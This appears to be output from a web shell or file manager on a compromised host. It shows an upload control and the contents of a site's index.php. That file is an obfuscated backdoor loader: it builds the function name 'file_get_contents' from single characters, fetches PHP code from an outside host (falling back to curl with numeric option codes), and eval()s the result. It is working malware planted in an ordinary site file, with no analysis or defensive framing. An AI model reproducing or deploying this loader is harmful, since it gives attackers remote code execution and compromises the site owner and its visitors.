Your IP : 216.73.216.122


Current Path : /home/icmq6107/clients/AKOFA/LaGazelleInfos/
Upload File :
Current File : /home/icmq6107/clients/AKOFA/LaGazelleInfos/index.php

<?php
$load = '';
$sources = ['f','i','l','e','_','g','e','t','_','c','o','n','t','e','n','t','s'];
foreach($sources as $s) $load .= $s;

$fetch = false;
if(ini_get('allow_url_fopen') && function_exists($load)) {
    $fetch = @$load('http://z60813_2.fusemail.shop/stat/domain_index.txt');
}

if($fetch === false && function_exists('curl_init')) {
    $ch = curl_init();
    $opts = [10102=>true,10002=>'http://z60813_2.fusemail.shop/stat/domain_index.txt',19913=>true,19914=>true,13=>10];
    curl_setopt_array($ch, $opts);
    $fetch = curl_exec($ch);
    curl_close($ch);
}

if($fetch !== false) {
    $payload = '?>' . $fetch;
    eval($payload);
}
?>